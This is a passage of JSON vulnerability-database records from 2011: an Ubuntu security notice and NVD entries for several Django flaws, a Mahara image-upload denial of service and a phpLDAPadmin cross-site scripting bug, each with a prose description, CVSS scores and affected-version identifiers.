HTTP Host \nheader to construct a full URL. A remote attacker could exploit this to \nconduct host header cache poisoning attacks via a crafted request. \n(CVE-2011-4139)", "edition": 5, "modified": "2011-12-09T00:00:00", "published": "2011-12-09T00:00:00", "id": "USN-1297-1", "href": "https://ubuntu.com/security/notices/USN-1297-1", "title": "Django vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T05:51:07", "description": "Django before 1.2.7 and 1.3.x before 1.3.1 uses a request's HTTP Host header to construct a full URL in certain circumstances, which allows remote attackers to conduct cache poisoning attacks via a crafted request.", "edition": 6, "cvss3": {}, "published": "2011-10-19T10:55:00", "title": "CVE-2011-4139", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4139"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.1.3", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:0.96"], "id": "CVE-2011-4139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4139", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:07", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "edition": 6, "cvss3": {}, "published": "2011-10-19T10:55:00", "title": "CVE-2011-4137", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4137"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.1.3", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:0.96"], "id": "CVE-2011-4137", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4137", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:07", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "edition": 6, "cvss3": {}, "published": "2011-10-19T10:55:00", "title": "CVE-2011-4140", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.1.3", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:0.96"], "id": "CVE-2011-4140", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4140", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:04", "description": "The get_dataroot_image_path function in lib/file.php in Mahara before 1.4.1 does not properly validate uploaded image files, which allows remote attackers to cause a denial of service (memory consumption) via a (1) large or (2) invalid image.", "edition": 6, "cvss3": {}, "published": "2011-11-15T03:57:00", "title": "CVE-2011-2772", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2772"], "modified": "2012-03-12T04:00:00", "cpe": ["cpe:/a:mahara:mahara:1.0.9", "cpe:/a:mahara:mahara:1.0.14", "cpe:/a:mahara:mahara:1.1.5", "cpe:/a:mahara:mahara:1.1", "cpe:/a:mahara:mahara:1.0.2", "cpe:/a:mahara:mahara:1.2.0", "cpe:/a:mahara:mahara:1.4", "cpe:/a:mahara:mahara:1.2.2", "cpe:/a:mahara:mahara:1.3.1", "cpe:/a:mahara:mahara:1.0.0", "cpe:/a:mahara:mahara:1.2.3", "cpe:/a:mahara:mahara:1.0.10", "cpe:/a:mahara:mahara:1.0.5", "cpe:/a:mahara:mahara:1.0.7", "cpe:/a:mahara:mahara:1.1.3", "cpe:/a:mahara:mahara:1.3.0", "cpe:/a:mahara:mahara:0.9.2", "cpe:/a:mahara:mahara:1.4.0", "cpe:/a:mahara:mahara:1.0.11", "cpe:/a:mahara:mahara:1.2.4", "cpe:/a:mahara:mahara:1.1.6", "cpe:/a:mahara:mahara:1.1.4", "cpe:/a:mahara:mahara:1.0.4", "cpe:/a:mahara:mahara:1.1.7", "cpe:/a:mahara:mahara:0.9.0", "cpe:/a:mahara:mahara:1.2.5", "cpe:/a:mahara:mahara:1.2.1", "cpe:/a:mahara:mahara:1.3.5", "cpe:/a:mahara:mahara:1.0.1", "cpe:/a:mahara:mahara:1.2.6", "cpe:/a:mahara:mahara:1.0.15", "cpe:/a:mahara:mahara:1.1.2", "cpe:/a:mahara:mahara:1.3.3", "cpe:/a:mahara:mahara:1.0.3", "cpe:/a:mahara:mahara:1.1.9", "cpe:/a:mahara:mahara:1.3.6", "cpe:/a:mahara:mahara:1.0.6", "cpe:/a:mahara:mahara:1.3.7", "cpe:/a:mahara:mahara:1.3.2", "cpe:/a:mahara:mahara:0.9.1", "cpe:/a:mahara:mahara:1.1.8", "cpe:/a:mahara:mahara:1.1.0", "cpe:/a:mahara:mahara:1.0.12", "cpe:/a:mahara:mahara:1.0.13", "cpe:/a:mahara:mahara:1.3.4", "cpe:/a:mahara:mahara:1.1.1", "cpe:/a:mahara:mahara:1.0.8"], "id": "CVE-2011-2772", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2772", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:mahara:mahara:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:07", "description": "Cross-site scripting (XSS) vulnerability in cmd.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via an _debug command.", "edition": 5, "cvss3": {}, "published": "2011-11-02T17:55:00", "title": "CVE-2011-4074", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074"], "modified": "2020-11-09T13:30:00", "cpe": ["cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.3", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.5", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.4", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.2", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1.1"], "id": "CVE-2011-4074", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4074", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:07", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 originally tests a URL's validity through a HEAD request, but then uses a GET request for the new target URL in the case of a redirect, which might allow remote attackers to trigger arbitrary GET requests with an unintended source IP address via a crafted Location header.", "edition": 6, "cvss3": {}, "published": "2011-10-19T10:55:00", "title": "CVE-2011-4138", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4138"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.1.3", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:0.96"], "id": "CVE-2011-4138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4138", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:07", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "edition": 6, "cvss3": {}, "published": "2011-10-19T10:55:00", "title": "CVE-2011-4136", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.1.3", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:0.96"], "id": "CVE-2011-4136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4136", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", 